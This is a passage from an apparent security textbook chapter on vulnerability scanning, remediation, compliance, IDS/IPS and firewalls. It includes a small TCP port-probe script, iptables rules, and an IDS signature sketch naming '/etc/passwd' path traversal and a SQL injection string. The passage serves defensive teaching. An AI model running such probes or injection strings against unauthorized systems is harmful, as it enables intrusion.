organization’s business. When essential data is not available,
even for a brief period of time, or when its integrity is
questionable, the organization is unable to function. Data is
considered required when it is important to the organization
but organizational operations would continue for a
predetermined period of time even if the data were not
available. Data is nonessential if the organization can operate
without it during extended periods of time.
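These distinctions can be expressed as a simple classification rule. The downtime tolerances in the following minimal Python sketch are illustrative assumptions, not prescribed values:

def criticality(max_tolerable_downtime_hours: float) -> str:
    """Classify data by how long the organization can operate without it."""
    if max_tolerable_downtime_hours < 1:
        return "essential"      # business halts almost immediately
    if max_tolerable_downtime_hours <= 72:
        return "required"       # operations continue for a set period
    return "nonessential"       # extended operation possible without it

print(criticality(0.5))  # essential
print(criticality(24))   # required
print(criticality(200))  # nonessential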
Active vs. Passive Scanning
Network vulnerability scans probe a targeted system or network
to identify vulnerabilities. The tools used in this type of scan
contain a database of known vulnerabilities and identify
whether a specific vulnerability exists on each device. There are
two types of vulnerability scanning:
Passive vulnerability scanning: Passive vulnerability
scanning collects information but doesn’t take any action to block
an attack. A passive vulnerability scanner (PVS) monitors network
traffic at the packet layer to determine topology, services, and
vulnerabilities. It avoids the instability that can be introduced to a
system by actively scanning for vulnerabilities. PVS tools analyze
the packet stream and look for vulnerabilities through direct
analysis. They are deployed in much the same way as intrusion
detection systems (IDSs) or packet analyzers. A PVS can pick a
network session that targets a protected server and monitor it as
much as needed. The biggest benefit of a PVS is its capability to do
its work without impacting the monitored network. Some examples
of PVSs are the Nessus Network Monitor (formerly Tenable PVS)
and NetScanTools Pro.
Active vulnerability scanning: Active vulnerability scanning
collects information and can attempt to block an attack. Whereas
passive scanners can only gather information, active vulnerability
scanners (AVSs) can take action to block an attack, such as blocking
a dangerous IP address. AVSs can also be used to simulate an attack
to assess readiness. They operate by sending transmissions to nodes
and examining the responses (a simple connect-probe sketch follows
this list). Because of this, these scanners may disrupt network
traffic. Examples include Nessus Professional and OpenVAS.
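The following minimal Python sketch illustrates the “send transmissions and examine the responses” idea behind active scanning with a basic TCP connect probe. The target address is from a reserved documentation range (TEST-NET-1), and you should probe only hosts you are authorized to test.

import socket

def probe(host: str, ports: list[int]) -> list[int]:
    """Return the subset of ports that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1.0)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

print(probe("192.0.2.10", [22, 80, 443]))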
Regardless of whether it’s active or passive, a vulnerability
scanner cannot replace the expertise of trained security
personnel. Moreover, these scanners are only as effective as the
signature databases on which they depend, so the databases
must be updated regularly. Finally, because scanners require
bandwidth, they potentially slow the network. For best
performance, you can place a vulnerability scanner in a subnet
that needs to be protected. You can also connect a scanner
through a firewall to multiple subnets; this complicates the
configuration and requires opening ports on the firewall, which
could be problematic and could impact the performance of the
firewall.
Mapping/Enumeration
Vulnerability mapping and enumeration is the process of
identifying and listing vulnerabilities. In Chapter 2, “Utilizing
Threat Intelligence to Support Organizational Security,” you
were introduced to the Common Vulnerability Scoring System
(CVSS). A closely related concept is the Common Weakness
Enumeration (CWE), a category system for software weaknesses
and vulnerabilities. CWE organizes vulnerabilities into over 600
categories, including classes for buffer overflows, path/directory
tree traversal errors, race conditions, cross-site scripting, hard-coded passwords, and insecure random numbers. CWE is only
one of a number of enumerations that are used by Security
Content Automation Protocol (SCAP), a standard that the
security community uses to enumerate software flaws and
configuration issues. SCAP will be covered more fully in Chapter
14, “Automation Concepts and Technologies.”
VALIDATION
Scanning results are not always correct. Scanning tools can
make mistakes identifying vulnerabilities. There are four types
of results a scanner can deliver:
True positive: Occurs when the scanner correctly identifies a
vulnerability. True means the scanner is correct, and positive means
it identified a vulnerability.
False positive: Occurs when the scanner identifies a vulnerability
that does not exist. False means the scanner is incorrect, and positive
means it identified a vulnerability. A large number of false positives
reduces confidence in scanning results.
True negative: Occurs when the scanner correctly determines
that a vulnerability does not exist. True means the scanner is
correct, and negative means it did not identify a vulnerability.
False negative: Occurs when the scanner does not identify a
vulnerability that actually exists. False means the scanner is wrong,
and negative means it did not find a vulnerability. This is worse
than a false positive because it means that a vulnerability exists that
you are unaware of.
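The four result types above amount to comparing what the scanner reported against ground truth. A minimal Python sketch of that mapping:

def classify(reported: bool, actually_vulnerable: bool) -> str:
    """Map a scanner finding against ground truth to a result type."""
    if reported and actually_vulnerable:
        return "true positive"
    if reported and not actually_vulnerable:
        return "false positive"
    if not reported and actually_vulnerable:
        return "false negative"  # the most dangerous outcome
    return "true negative"

print(classify(reported=False, actually_vulnerable=True))  # false negative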
REMEDIATION/MITIGATION
When vulnerabilities are identified, security professionals must
take steps to address them. One of the outputs of a good risk
management process is the prioritization of the vulnerabilities
and an assessment of the impact and likelihood of each. Driven
by those results, security measures (also called controls or
countermeasures) can be put in place to reduce risk. Let’s look
at some issues relevant to vulnerability mitigation.
Configuration Baseline
A baseline is a floor, or minimum standard, that is required.
Configuration baselines are the security settings that are
required on devices of various types. These settings should be
driven by the results of the vulnerability and risk management
processes.
One practice that can make maintaining security simpler is to
create and deploy standard images that have been secured with
security baselines. A security baseline is a set of configuration
settings that provide a floor of minimum security in the image
being deployed.
Security baselines can be controlled through the use of Group
Policy in Windows. These policy settings can be made in the
image and applied to both users and computers. These settings
are refreshed periodically through a connection to a domain
controller and cannot be altered by the user. It is also quite
common for the deployment image to include all of the most
current operating system updates and patches as well. This
creates consistency across devices and helps prevent security
issues caused by human error in configuration.
When a network makes use of these types of technologies, the
administrators have created a standard operating environment.
The advantages of such an environment are more consistent
behavior of the network and simpler support issues. Scans of the
systems should be performed weekly to detect changes to
the baseline.
Security professionals should help guide their organization
through the process of establishing the security baselines. If an
organization implements very strict baselines, it will provide a
higher level of security but can actually be too restrictive.
If an organization implements a very lax baseline, it will provide
a lower level of security and will likely result in security
breaches. Security professionals should understand the balance
between protecting the organizational assets and allowing users
access and should work to ensure that both ends of this
spectrum are understood.
Patching
Patch management, or patching, is often seen as a subset of
configuration management. Software patches are updates
released by vendors that either fix functional issues with or
close security loopholes in operating systems, applications, and
versions of firmware that run on network devices.
To ensure that all devices have the latest patches installed, you
should deploy a formal system to ensure that all systems receive
the latest updates after thorough testing in a non-production
environment. It is impossible for a vendor to anticipate every
possible impact a change might have on business-critical
systems in a network. The enterprise is responsible for ensuring
that patches do not adversely impact operations.
The patch management life cycle includes the following steps:
Step 1. Determine the priority of the patches and schedule
the patches for deployment.
Step 2. Test the patches prior to deployment to ensure that
they work properly and do not cause system or security
issues.
Step 3. Install the patches in the live environment.
Step 4. After the patches are deployed, ensure that they work
properly.
Many organizations deploy a centralized patch management
system to ensure that patching is deployed in a timely
manner. With this system, administrators can test and review
all patches before deploying them to the systems they affect.
Administrators can schedule the updates to occur during non-peak hours.
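The life cycle can be sketched as a simple gated workflow. In the following minimal Python sketch, the patch name and the install and verify helpers are hypothetical placeholders; the point is that Step 2 (testing) gates Step 3 (installation).

def install(patch: str) -> None:
    # Placeholder for the real deployment mechanism (Step 3).
    print(f"installing {patch} in the live environment")

def verify(patch: str) -> str:
    # Placeholder for post-deployment checks (Step 4).
    return f"{patch}: deployed and verified"

def manage_patch(patch: str, priority: int, test_passed: bool) -> str:
    print(f"scheduled '{patch}' at priority {priority}")  # Step 1
    if not test_passed:                                   # Step 2
        return f"{patch}: failed testing; do not deploy"
    install(patch)                                        # Step 3
    return verify(patch)                                  # Step 4

print(manage_patch("example-security-update", priority=1, test_passed=True))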
Hardening
Another of the ongoing goals of operations security is to ensure
that all systems have been hardened to the extent that is
possible and still provide functionality. The hardening can be
accomplished both on physical and logical bases. From a logical
perspective:
Remove unnecessary applications.
Disable unnecessary services.
Block unrequired ports.
Tightly control the connecting of external storage devices and
media (if it’s allowed at all).
Compensating Controls
Not all vulnerabilities can be eliminated. In some cases, they
can only be mitigated. This can be done by implementing
compensating controls (also known as countermeasures or
safeguards) that compensate for a vulnerability that cannot be
completely eliminated by reducing the potential risk of that
vulnerability being exploited. Three things must be considered
when implementing a compensating control: vulnerability,
threat, and risk. For example, a good compensating control
might be to implement the appropriate access control list (ACL)
and encrypt the data. The ACL protects the integrity of the data,
and the encryption protects the confidentiality of the data.
Note
For more information on compensating controls, see
http://pcidsscompliance.net/overview/what-are-compensating-controls/.
Risk Acceptance
You learned about risk management in Chapter 2. Part of the
risk management process is deciding how to address a
vulnerability. There are several ways to react. Risk reduction is
the process of altering elements of the organization in response
to risk analysis. After an organization understands its risk, it
must determine how to handle the risk. The following four basic
methods are used to handle risk:
Risk avoidance: Terminating the activity that causes a risk or
choosing an alternative that is not as risky
Risk transfer: Passing on the risk to a third party, such as an
insurance company
Risk mitigation: Defining the acceptable risk level the
organization can tolerate and reducing the risk to that level
Risk acceptance: Understanding and accepting the level of risk
as well as the cost of damages that can occur
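When a quantitative assessment is available (as noted earlier, both quantitative and qualitative assessments may be performed), the accept-versus-mitigate decision can be framed with annualized loss expectancy (ALE), the product of single loss expectancy (SLE) and annual rate of occurrence (ARO). The figures in this minimal Python sketch are illustrative assumptions.

def ale(sle: float, aro: float) -> float:
    """Annualized loss expectancy = SLE x ARO."""
    return sle * aro

expected_annual_loss = ale(sle=40_000, aro=0.5)  # $20,000 per year
annual_control_cost = 25_000
print("mitigate" if annual_control_cost < expected_annual_loss
      else "consider accepting the risk")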
Verification of Mitigation
Once a threat has been remediated, you should verify that the
mitigation has solved the issue. You should also take steps to
ensure that all is back to its normal secure state. These steps
validate that you are finished and can move on to taking
corrective actions with respect to the lessons learned.
Patching: In many cases, a threat or an attack is made possible by
missing security patches. You should update or at least check for
updates for a variety of components. This includes all patches for
the operating system, updates for any applications that are running,
and updates to all anti-malware software that is installed. While you
are at it, check for any firmware update the device may require. This
is especially true of hardware security devices such as firewalls,
IDSs, and IPSs. If any routers or switches are compromised, check
for software and firmware updates.
Permissions: Many times an attacker compromises a device by
altering the permissions, either in the local database or in entries
related to the device in the directory service server. All permissions
should undergo a review to ensure that all are in the appropriate
state. The appropriate state might not be the state they were in
before the event. Sometimes you may discover that although
permissions were not set in a dangerous way prior to the event, they
are still not correct. Make sure to check the configuration database to
ensure that settings match prescribed settings. You should also
make changes to the permissions based on lessons learned during
an event. In that case, ensure that the new settings undergo a
change control review and that any approved changes are reflected
in the configuration database.
Scanning: Even after you have taken all steps described thus far,
consider using a vulnerability scanner to scan the devices or the
network of devices that were affected. Make sure before you do so
that you have updated the scanner so it can recognize the latest
vulnerabilities and threats. This will help catch any lingering
vulnerabilities that might still be present.
Verify logging/communication to security monitoring: To
ensure that you will have good security data going forward, you
need to ensure that all logs related to security are collecting data.
Pay special attention to the manner in which the logs react when
full. With some settings, the log begins to overwrite older entries
with new entries. With other settings, the service stops collecting
events when the log is full. Security log entries need to be preserved.
This may require manual archiving of the logs and subsequent
clearing of the logs. Some logs make this possible automatically,
whereas others require a script. If all else fails, check the log often
to assess its state. Many organizations send all security logs to a
central location. This could be a Syslog server, or it could be a
security information and event management (SIEM) system. These
systems not only collect all the logs but also use the information to
make inferences about possible attacks. Having access to all logs
enables the system to correlate all the data from all responding
devices. Regardless of whether you are logging to a Syslog server or
a SIEM system, you should verify that all communications between
the devices and the central server are occurring without a hitch.
This is especially true if you had to rebuild the system manually
rather than restore from an image, as there would be more
opportunity for human error in the rebuilding of the device.
SCANNING PARAMETERS AND CRITERIA
Scanning is the process of using scanning tools to identify
security issues. Typical issues discovered include missing
patches, weak passwords, and insecure configurations. While
types of scanning are covered in Chapter 4, “Analyzing
Assessment Output,” let’s look at some issues and
considerations supporting the process.
Risks Associated with Scanning Activities
While vulnerability scanning is an advisable and valid process,
there are some risks to note:
A false sense of security can be introduced because scans are not
error free.
Many tools rely on a database of known vulnerabilities and are only
as valid as the latest update.
Identifying vulnerabilities does not in and of itself reduce your risk
or improve your security.
Vulnerability Feed
Vulnerability feeds are RSS feeds dedicated to the sharing of
information about the latest vulnerabilities. Subscribing to
these feeds can enhance the knowledge of the scanning team
and can keep the team abreast of the latest issues. For example,
the National Vulnerability Database is the U.S. government
repository of standards-based vulnerability management data
represented using the Security Content Automation Protocol
(SCAP) (covered in Chapter 14).
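As an illustration, the following minimal Python sketch pulls recently published CVEs. It assumes the NVD REST API 2.0 endpoint, parameter names, and JSON layout, so treat it as a starting point rather than a definitive client.

import json
import urllib.request

URL = ("https://services.nvd.nist.gov/rest/json/cves/2.0"
       "?pubStartDate=2021-01-01T00:00:00.000"
       "&pubEndDate=2021-01-07T00:00:00.000")

with urllib.request.urlopen(URL, timeout=30) as resp:
    data = json.load(resp)

# Print the CVE identifier of each vulnerability in the window.
for item in data.get("vulnerabilities", []):
    print(item["cve"]["id"])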
Scope
The scope of a scan defines what will be scanned and what type
of scan will be performed. It defines what areas of the
infrastructure will be scanned, and this part of the scope should
therefore be driven by where the assets of concern are located.
Limiting the scan areas helps ensure that accidental scanning of
assets and devices not under the direct control of the
organization does not occur (because it could cause legal
issues). Scope might also include times of day when scanning
should not occur.
In the OpenVAS vulnerability scanner, you can set the scope by
setting the plug-ins and the targets. Plug-ins define the scans to
be performed, and targets specify the machines. Figure 3-1
shows where plug-ins are chosen, and Figure 3-2 shows where
the targets are set.
Figure 3-1 Selecting Plug-ins in OpenVAS
Figure 3-2 Selecting Targets in OpenVAS
Credentialed vs. Non-credentialed
Another decision that needs to be made before performing a
vulnerability scan is whether to perform a credentialed scan or a
non-credentialed scan. A credentialed scan is a scan that is
performed by someone with administrative rights to the host
being scanned, while a non-credentialed scan is performed
by someone lacking these rights.
Non-credentialed scans generally run faster and require less
setup but do not generate the same quality of information as a
credentialed scan. This is because credentialed scans can
enumerate information from the host itself, whereas non-credentialed scans can only look at ports and only enumerate
software that will respond on a specific port. Credentialed
scanning also has the following benefits:
Operations are executed on the host itself rather than across the
network.
A more definitive list of missing patches is provided.
Client-side software vulnerabilities are uncovered.
A credentialed scan can read password policies, obtain a list of USB
devices, check antivirus software configurations, and even
enumerate Bluetooth devices attached to scanned hosts.
Figure 3-3 shows that when you create a new scan policy in
Nessus, one of the available steps is to set credentials. Here you
can see that Windows credentials are chosen as the type, and
the SMB account and password are set.
Figure 3-3 Setting Credentials for a Scan in Nessus
Server-based vs. Agent-based
Vulnerability scanners can use agents that are installed on the
devices, or they can be agentless. While many vendors argue
that using agents is always best, there are advantages and
disadvantages to both, as presented in Table 3-2.
Table 3-2 Server-Based vs. Agent-Based Scanning

Type           Technology        Characteristics
Agent based    Pull technology   Can get information from disconnected machines or
                                 machines in the DMZ; ideal for remote locations that
                                 have limited bandwidth; less dependent on network
                                 connectivity; based on policies defined on the central
                                 console
Server based   Push technology   Good for networks with plentiful bandwidth; dependent
                                 on network connectivity; central authority does all the
                                 scanning and deployment
Some scanners can do both agent-based and server-based
scanning (also called agentless or sensor-based scanning). For
example, Figure 3-4 shows the Nessus templates library with
both categories of templates available.
Figure 3-4 Nessus Template Library
Internal vs. External
Scans can be performed from within the network perimeter or
from outside the perimeter. This choice has a big effect on the
results and their interpretation. Typically the type of scan is
driven by what the tester is looking for. If the tester’s area of
interest is vulnerabilities that can be leveraged from outside the
perimeter to penetrate the perimeter, then an external scan is
in order. In this type of scan, either the sensors of the appliance
are placed outside the perimeter or, in the case of software
running on a device, the device itself is placed outside the
perimeter.
On the other hand, if the tester’s area of interest is
vulnerabilities that exist within the perimeter—that is,
vulnerabilities that could be leveraged by outsiders who have
penetrated the perimeter or by malicious insiders (your own
people)—then an internal scan is indicated. In this case,
either the sensors of the appliance are placed inside the
perimeter or, in the case of software running on a device, the
device itself is placed inside the perimeter.
Special Considerations
Just as the requirements of the vulnerability management
program were defined in the beginning of the process, scanning
criteria must be settled upon before scanning begins. This will
ensure that the proper data is generated and that the conditions
under which the data will be collected are well understood. This
will result in a better understanding of the context in which the
data was obtained and better analysis. Some of the criteria that
might be considered are described in the following sections.
Types of Data
The types of data with which you are concerned should have an
effect on how you run the scan. Many tools offer the capability
to focus on certain types of vulnerabilities that relate specifically
to certain data types.
Technical Constraints
In some cases the scan will be affected by technical constraints.
Perhaps the way in which you have segmented the network
caused you to have to run the scan multiple times from various
locations in the network. You will also be limited by the
technical capabilities of the scan tool you use.
Workflow
Workflow can also influence the scan. You might be limited to
running scans at certain times because scanning negatively affects
workflow. While security is important, it isn't helpful if it
detracts from the business processes that keep the organization in
business.
Sensitivity Levels
Scanning tools have sensitivity level settings that impact both
the number of results and the tool’s judgment of the results.
Most systems assign a default severity level to each
vulnerability. In some cases, security analysts may find that
certain events that the system is tagging as vulnerabilities are
actually not vulnerabilities but that the system has
mischaracterized them. In other cases, an event might be a
vulnerability but the severity level assigned is too extreme or
not extreme enough. In that case the analyst can either dismiss
the vulnerability, which means the system stops reporting it, or
manually define a severity level for the event that is more
appropriate. Keep in mind that these systems are not perfect.
Sensitivity also refers to how deeply a scan probes each host.
Scanning tools have templates that can be used to perform
certain types of scans. These are two of the most common
templates in use:
Discovery scans: These scans are typically used to create an asset
inventory of all hosts and all available services.
Assessment scans: These scans are more comprehensive than
discovery scans and can identify misconfigurations, malware,
application settings that are against policy, and weak passwords.
These scans have a significant impact on the scanned device.
Figure 3-5 shows the All Templates page in Nessus, with
scanning templates like the ones just discussed.
Figure 3-5 Scanning Templates in Nessus
Regulatory Requirements
Does the organization operate in an industry that is regulated?
If so, all regulatory requirements must be recorded, and the
vulnerability assessment must be designed to support all
requirements. The following are some examples of industries in
which security requirements exist:
Finance (for example, banks and brokerages)
Medical (for example, hospitals, clinics, and insurance companies)
Retail (for example, credit card and customer information)
Legislation such as the following can affect organizations
operating in these industries:
Sarbanes-Oxley Act (SOX): The Public Company Accounting
Reform and Investor Protection Act of 2002, more commonly
known as the Sarbanes-Oxley Act (SOX), affects any organization
that is publicly traded in the United States. It controls the
accounting methods and financial reporting for the organizations
and stipulates penalties and even jail time for executive officers who
fail to comply with its requirements.
Health Insurance Portability and Accountability Act
(HIPAA): HIPAA, also known as the Kennedy-Kassebaum Act,
affects all healthcare facilities, health insurance companies, and
healthcare clearing houses. It is enforced by the Office of Civil
Rights (OCR) of the Department of Health and Human Services
(HHS). It provides standards and procedures for storing, using, and
transmitting medical information and healthcare data. HIPAA
overrides state laws unless the state laws are stricter. This act
directly affects the security of protected health information (PHI).
Gramm-Leach-Bliley Act (GLBA) of 1999: The Gramm-Leach-Bliley Act (GLBA) of 1999 affects all financial institutions,
including banks, loan companies, insurance companies, investment
companies, and credit card providers. It provides guidelines for
securing all financial information and prohibits sharing financial
information with third parties. This act directly affects the security
of personally identifiable information (PII).
Payment Card Industry Data Security Standard (PCI DSS):
PCI DSS v3.2.1, released in 2018, is the latest version of the PCI
DSS standard as of this writing. It encourages and enhances
cardholder data security and facilitates the broad adoption of
consistent data security measures globally. Table 3-3 shows a high-level overview of the PCI DSS standard.
Table 3-3 High-Level Overview of PCI DSS

Build and Maintain a Secure Network and Systems
1. Install and maintain a firewall configuration to protect cardholder data
2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data
3. Protect stored cardholder data
4. Encrypt transmission of cardholder data across open, public networks

Maintain a Vulnerability Management Program
5. Protect all systems against malware and regularly update antivirus software or programs
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to cardholder data by business need to know
8. Identify and authenticate access to system components
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes

Maintain an Information Security Policy
12. Maintain a policy that addresses information security for all personnel
Segmentation
Segmentation is the process of dividing a network at either
Layer 2 or Layer 3. When VLANs are used, there is
segmentation at both Layer 2 and Layer 3, and with IP subnets,
there is segmentation at Layer 3. Segmentation is usually done
for one or both of the following reasons:
To create smaller, less congested subnets
To create security borders
In either case, segmentation can affect how you conduct a
vulnerability scan. By segmenting critical assets and resources
from less critical systems, you can restrict the scan to the
segments of interest, reducing the time to conduct a scan while
reducing the amount of irrelevant data. This is not to suggest
that you should not scan the less critical parts of the network;
it’s just that you can adopt a less robust schedule for those
scans.
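Because segments are defined by Layer 2 or Layer 3 boundaries, scan scope can be filtered programmatically. The following minimal Python sketch (using reserved documentation addresses) keeps only the candidate hosts that fall inside the critical segment:

import ipaddress

critical_segment = ipaddress.ip_network("192.0.2.0/26")
candidates = ["192.0.2.10", "192.0.2.77", "198.51.100.5"]

# Scan only the hosts that fall inside the segment of interest.
in_scope = [ip for ip in candidates
            if ipaddress.ip_address(ip) in critical_segment]
print(in_scope)  # ['192.0.2.10']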
Intrusion Prevention System (IPS), Intrusion Detection System
(IDS), and Firewall Settings
The settings that exist on the security devices will impact the
scan and in many cases are the source of a technical constraint, as
mentioned earlier. Scans might be restricted by firewall settings,
and a scan can cause alerts to be generated by your intrusion
devices. Let's talk a bit more about these devices.
Vulnerability scanners are not the only tools used to identify
vulnerabilities. The following systems should also be
implemented as a part of a comprehensive solution.
IDS/IPS
While you can use packet analyzers to manually monitor the
network for issues during environmental reconnaissance, a less
labor-intensive and more efficient way to detect issues is
through the use of intrusion detection systems (IDSs) and
intrusion prevention systems (IPSs). An IDS is responsible for
detecting unauthorized access or attacks against systems and
networks. It can verify, itemize, and characterize threats from
outside and inside the network. Most IDSs are programmed to
react in certain ways in specific situations. Event notification
and alerts are crucial to an IDS. They inform administrators and
security professionals when and where attacks are detected. IDS
implementations are further divided into the following
categories:
Signature based: This type of IDS analyzes traffic and compares
it to attack or state patterns, called signatures, that reside within the
IDS database. This type of IDS is also referred to as a misuse-detection
system. Although this type of IDS is very popular, it can only
recognize attacks as compared with its database and is only as
effective as the signatures provided. Frequent database updates are
necessary. There are two main types of signature-based IDSs:
Pattern matching: The IDS compares traffic to a database of
attack patterns. The IDS carries out specific steps when it detects
traffic that matches an attack pattern (a minimal sketch of this
idea follows this list).
Stateful matching: The IDS records the initial operating
system state. Any changes to the system state that specifically
violate the defined rules result in an alert or notification being
sent.
Anomaly-based: This type of IDS analyzes traffic and compares it
to normal traffic to determine whether said traffic is a threat. It is
also referred to as a behavior-based, or profile-based, system. The
problem with this type of system is that any traffic outside expected
norms is reported, resulting in more false positives than you see
with signature-based systems. There are three main types of
anomaly-based IDSs:
Statistical anomaly-based: The IDS samples the live
environment to record activities. The longer the IDS is in
operation, the more accurate the profile that is built. However,
developing a profile that does not have a large number of false
positives can be difficult and time-consuming. Thresholds for
activity deviations are important in this IDS. Too low a threshold
results in false positives, whereas too high a threshold results in
false negatives.
Protocol anomaly-based: The IDS has knowledge of the
protocols it will monitor. A profile of normal usage is built and
compared to activity.
Traffic anomaly-based: The IDS tracks traffic pattern
changes. All future traffic patterns are compared to the sample.
Changing the threshold reduces the number of false positives or
negatives. This type of filter is excellent for detecting unknown
attacks, but user activity might not be static enough to effectively
implement this system.
Rule or heuristic based: This type of IDS is an expert system
that uses a knowledge base, an inference engine, and rule-based
programming. The knowledge is configured as rules. The data and
traffic are analyzed, and the rules are applied to the analyzed traffic.
The inference engine uses its intelligent software to “learn.” When
characteristics of an attack are met, they trigger alerts or
notifications. This is often referred to as an IF/THEN, or expert,
system.
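The following minimal Python sketch illustrates the pattern-matching idea referenced in the list above. The two signatures are illustrative stand-ins, not a real IDS ruleset.

# A tiny signature database: byte patterns mapped to attack names.
SIGNATURES = {
    b"/etc/passwd": "path traversal attempt",
    b"' OR '1'='1": "SQL injection attempt",
}

def inspect_payload(payload: bytes) -> list[str]:
    """Return the names of any signatures found in the payload."""
    return [name for pattern, name in SIGNATURES.items()
            if pattern in payload]

print(inspect_payload(b"GET /../../etc/passwd HTTP/1.1"))  # ['path traversal attempt']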
An application-based IDS is a specialized IDS that analyzes
transaction log files for a single application. This type of IDS is
usually provided as part of an application or can be purchased
as an add-on.
An IPS is a system responsible for preventing attacks. When an
attack begins, an IPS takes actions to contain the attack. An IPS,
like an IDS, can be network or host based. Although an IPS can
be signature or anomaly based, it can also use a rate-based
metric that analyzes the volume of traffic as well as the type of
traffic. In most cases, implementing an IPS is more costly than
implementing an IDS because of the added security needed to
contain attacks compared to the security needed to simply
detect attacks. In addition, running an IPS is more of an overall
performance load than running an IDS.
HIDS/NIDS
The most common way to classify an IDS is based on its
information source: network based or host based. The most
common IDS, the network-based IDS (NIDS), monitors
network traffic on a local network segment. To monitor traffic
on the network segment, the network interface card (NIC) must
be operating in promiscuous mode—a mode in which the NIC
processes all traffic and not just the traffic directed to the host. A
NIDS can only monitor the network traffic. It cannot monitor
any internal activity that occurs within a system, such as an
attack against a system that is carried out by logging on to the
system’s local terminal. A NIDS is affected by a switched
network because generally a NIDS monitors only a single
network segment. A host-based IDS (HIDS) is an IDS that is
installed on a single host and protects only that host.
Firewall
The network device that perhaps is most connected with the
idea of security is the firewall. Firewalls can be software
programs that are installed over server operating systems, or
they can be appliances that have their own operating system. In
either case, the job of firewalls is to inspect and control the type
of traffic allowed. Firewalls can be discussed on the basis of
their type and their architecture. They can also be physical
devices or exist in a virtualized environment. The following
sections look at them from all angles.
Firewall Types
When we discuss types of firewalls, we are focusing on the
differences in the way they operate. Some firewalls make a more
thorough inspection of traffic than others. Usually there is
trade-off in the performance of the firewall and the type of
inspection it performs. A deep inspection of the contents of each
packet results in the firewall having a detrimental effect on
throughput, whereas a more cursory look at each packet has
somewhat less of an impact on performance. It is therefore
important to carefully select what traffic to inspect, keeping this
trade-off in mind.
Packet-filtering firewalls are the least detrimental to throughput
because they inspect only the header of a packet for allowed IP
addresses or port numbers. Although even performing this
function slows traffic, it involves only looking at the beginning
of the packet and making a quick allow or disallow decision.
Although packet-filtering firewalls serve an important function,
they cannot prevent many attack types. They cannot prevent IP
spoofing, attacks that are specific to an application, attacks that
depend on packet fragmentation, or attacks that take advantage
of the TCP handshake. More advanced inspection firewall types
are required to stop these attacks.
Stateful firewalls are aware of the proper functioning of the TCP
handshake, keep track of the state of all connections with
respect to this process, and can recognize when packets that are
trying to enter the network don’t make sense in the context of
the TCP handshake. For example, a packet should never arrive
at a firewall for delivery and have both the SYN flag and the
ACK flag set unless it is part of an existing handshake process,
and it should be in response to a packet sent from inside the
network with the SYN flag set. This is the type of packet that the
stateful firewall would disallow. A stateful firewall also has the
ability to recognize other attack types that attempt to misuse
this process. It does this by maintaining a state table about all
current connections and the status of each connection process.
This allows it to recognize any traffic that doesn’t make sense
with the current state of the connection. Of course, maintaining
this table and referencing it cause this firewall type to have
more effect on performance than does a packet-filtering
firewall.
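The state-table logic can be sketched in a few lines. In this minimal Python sketch, an inbound SYN+ACK is allowed only if it answers a SYN that the firewall previously saw leave the network; the addresses are illustrative.

# Half-open outbound connections awaiting a SYN+ACK reply.
state_table = set()

def record_outbound(src, dst, flags):
    if flags == {"SYN"}:
        state_table.add((src, dst))

def inbound_allowed(src, dst, flags) -> bool:
    if flags == {"SYN", "ACK"}:
        # Allowed only as the reply leg of a handshake we initiated.
        return (dst, src) in state_table
    return False

record_outbound(("10.0.0.5", 51000), ("203.0.113.7", 443), {"SYN"})
print(inbound_allowed(("203.0.113.7", 443), ("10.0.0.5", 51000),
                      {"SYN", "ACK"}))  # True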
Proxy firewalls actually stand between each connection from the
outside to the inside and make the connection on behalf of the
endpoints. Therefore, there is no direct connection. The proxy
firewall acts as a relay between the two endpoints. Proxy
firewalls can operate at two different layers of the OSI model.
Circuit-level proxies operate at the session layer (Layer 5) of the
OSI model. They make decisions based on the protocol header
and session layer information. Because they do not do deep
packet inspection (at Layer 7, the application layer), they are
considered application independent and can be used for wide
ranges of Layer 7 protocol types. A SOCKS firewall is an
example of a circuit-level proxy firewall. It requires a SOCKS
client on the computers. Many vendors have integrated their
software with SOCKS to make using this type of firewall easier.
Application-level proxies perform deep packet inspection. This
type of firewall understands the details of the communication
process at Layer 7 for the application of interest. An application-level firewall maintains a different proxy function for each
protocol. For example, for HTTP, the proxy can read and filter
traffic based on specific HTTP commands. Operating at this
layer requires each packet to be completely opened and closed,
so this type of firewall has the greatest impact on performance.
Dynamic packet filtering does not describe a type of firewall;
rather, it describes functionality that a firewall might or might
not possess. When an internal computer attempts to establish a
session with a remote computer, it places both a source and
destination port number in the packet. For example, if the
computer is making a request of a web server, because HTTP
uses port 80, the destination is port 80. The source computer
selects the source port at random from the numbers available
above the well-known port numbers (that is, above 1023).
Because predicting what that random number will be is
impossible, creating a firewall rule that anticipates and allows
traffic back through the firewall on that random port is
impossible.
A dynamic packet-filtering firewall keeps track of that source
port and dynamically adds a rule to the list to allow return
traffic to that port.
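To make these behaviors concrete, the following Linux iptables
rules are a minimal sketch (the interface names eth0 for the
untrusted side and eth1 for the internal side are assumptions
for illustration). The first rule is a simple stateless packet
filter; the last two show stateful inspection, and the
ESTABLISHED,RELATED match is also what a dynamic packet filter
relies on to admit return traffic to the client's randomly
chosen source port:

# Stateless packet filtering: allow any TCP traffic to port 80,
# with no awareness of connection state
iptables -A FORWARD -p tcp --dport 80 -j ACCEPT

# Stateful filtering: allow only NEW web connections initiated
# from inside, plus return traffic that matches an entry in the
# firewall's state table
iptables -A FORWARD -i eth1 -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT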
A kernel proxy firewall is an example of a fifth-generation
firewall. It inspects a packet at every layer of the OSI model but
does not introduce the same performance hit as an application-level firewall because it does this at the kernel layer. It also
follows the proxy model in that it stands between the two
systems and creates connections on their behalf.
Firewall Architecture
Whereas the type of firewall speaks to the internal operation of
the firewall, the architecture refers to the way in which the
firewall or firewalls are deployed in the network to form a
system of protection. This section looks at the various ways
firewalls can be deployed and the names of these various
configurations.
A bastion host might or might not be a firewall. The term
actually refers to the position of any device. If it is exposed
directly to the Internet or to any untrusted network, it is called a
bastion host. Whether it is a firewall, a DNS server, or a web
server, all standard hardening procedures become even more
important for these exposed devices. Any unnecessary services
should be stopped, all unneeded ports should be closed, and all
security patches must be up to date. These procedures are
